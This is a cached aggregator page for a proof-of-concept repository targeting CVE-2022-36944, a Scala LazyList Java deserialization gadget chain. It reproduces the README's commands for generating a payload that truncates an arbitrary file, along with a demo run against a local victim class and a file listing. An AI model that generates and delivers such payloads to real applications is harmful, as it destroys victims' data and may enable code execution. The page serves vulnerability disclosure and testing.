CVE-2022-36944 PoC — Scala 代码问题漏洞

Source

https://github.com/yarocher/lazylist-cve-poc

Associated Vulnerability

Title:Scala 代码问题漏洞 (CVE-2022-36944)
Description:Scala 2.13.x before 2.13.9 has a Java deserialization chain in its JAR file. On its own, it cannot be exploited. There is only a risk in conjunction with Java object deserialization within an application. In such situations, it allows attackers to erase contents of arbitrary files, make network connections, or possibly run arbitrary code (specifically, Function0 functions) via a gadget chain.

Description

POC for the CVE-2022-36944 vulnerability exploit

Readme

# CVE-2022-36944 payload generator
This mini-project is created to demonstrate proof of concept of [CVE-2022-36944](https://nvd.nist.gov/vuln/detail/CVE-2022-36944)
vulnerability. It is similar to [ysoserial](https://github.com/frohoff/ysoserial/), but generates payload only for this CVE with 
LazyList class.

## Quick FAQ
### What artifacts bring the vulnerability?
`org.scala-lang:scala-library` with versions `2.13.x` before `2.13.9` 
### What applications are vulnerable?
Two conditions must be combined to get your application exploitable:
- Your application contains vulnerable `scala-library` jar in classpath
- `ObjectInputStream#readObject()` is eventually called somewhere in your application and untrusted data
(attacker-controlled) is passed to it
### Where the vulnerability was fixed?
See scala PR: [#10118](https://github.com/scala/scala/pull/10118)

## Build
```agsl
mvn clean package
```

## Run
The following command will dump the payload in stdout which can be used to truncate arbitrary file
on victim's machine:
```agsl
mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.payload.Main" -Dexec.args="/file/to/truncate false"
```

## Demo
### A) Through a file
1. Prepare test file with some data inside:
```agsl
$ yes sometestdata > test_data
^C
$ head test_data 
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
```
2. Generate payload and save it to `payload.ser` file:
```agsl
$ mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.payload.Main" -Dexec.args="${PWD}/test_data false" > payload.ser
```
3. Run victim process (ClassCastException is expected):
```agsl
$ mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.victim.Victim" -Dexec.args="payload.ser"
[ERROR] Failed to execute goal org.codehaus.mojo:exec-maven-plugin:3.1.0:java (default-cli) on project lazylist-cve-poc: An exception occurred while executing the Java class. java.lang.ClassCastException: class java.io.FileOutputStream cannot be cast to class scala.collection.immutable.LazyList$State (java.io.FileOutputStream is in module java.base of loader 'bootstrap'; scala.collection.immutable.LazyList$State is in unnamed module of loader org.codehaus.mojo.exec.URLClassLoaderBuilder$ExecJavaClassLoader @72805168) -> [Help 1]
[ERROR] 
[ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch.
[ERROR] Re-run Maven using the -X switch to enable full debug logging.
[ERROR] 
[ERROR] For more information about the errors and possible solutions, please read the following articles:
[ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoExecutionException
```
4. Check that victim file is truncated:
```agsl
$ head test_data 
$ 
```
### B) Pipe to stdin
Steps 2-3 can be combined this way (use "-" as a file for Victim):
```agsl
$ mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.payload.Main" -Dexec.args="${PWD}/test_data false" | mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.victim.Victim" -Dexec.args="-"
[ERROR] Failed to execute goal org.codehaus.mojo:exec-maven-plugin:3.1.0:java (default-cli) on project lazylist-cve-poc: An exception occurred while executing the Java class. java.lang.ClassCastException: class java.io.FileOutputStream cannot be cast to class scala.collection.immutable.LazyList$State (java.io.FileOutputStream is in module java.base of loader 'bootstrap'; scala.collection.immutable.LazyList$State is in unnamed module of loader org.codehaus.mojo.exec.URLClassLoaderBuilder$ExecJavaClassLoader @72805168) -> [Help 1]
[ERROR] 
[ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch.
[ERROR] Re-run Maven using the -X switch to enable full debug logging.
[ERROR] 
[ERROR] For more information about the errors and possible solutions, please read the following articles:
[ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoExecutionException
```

File Snapshot


 [4.0K]  /data/pocs/41ac384f59118bbeab8457cbd04a364dda25d327
├── [1.2K]  pom.xml
├── [3.8K]  README.md
└── [4.0K]  src
    ├── [4.0K]  main
    │   └── [4.0K]  java
    │       └── [4.0K]  poc
    │           └── [4.0K]  cve
    │               └── [4.0K]  lazylist
    │                   ├── [4.0K]  function0
    │                   │   └── [2.9K]  DefaultProviders.java
    │                   ├── [4.0K]  payload
    │                   │   ├── [3.6K]  LazyList.java
    │                   │   ├── [ 514]  Main.java
    │                   │   └── [ 396]  PayloadGenerator.java
    │                   ├── [4.0K]  util
    │                   │   ├── [2.4K]  ReflectionUtil.java
    │                   │   └── [ 924]  SerdeUtil.java
    │                   └── [4.0K]  victim
    │                       └── [ 790]  Victim.java
    └── [4.0K]  test
        └── [4.0K]  java
            └── [4.0K]  poc
                └── [4.0K]  cve
                    └── [4.0K]  lazylist
                        ├── [4.0K]  function0
                        │   └── [2.7K]  DefaultProvidersTest.java
                        └── [4.0K]  payload
                            └── [1.6K]  LazyListTest.java

17 directories, 11 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!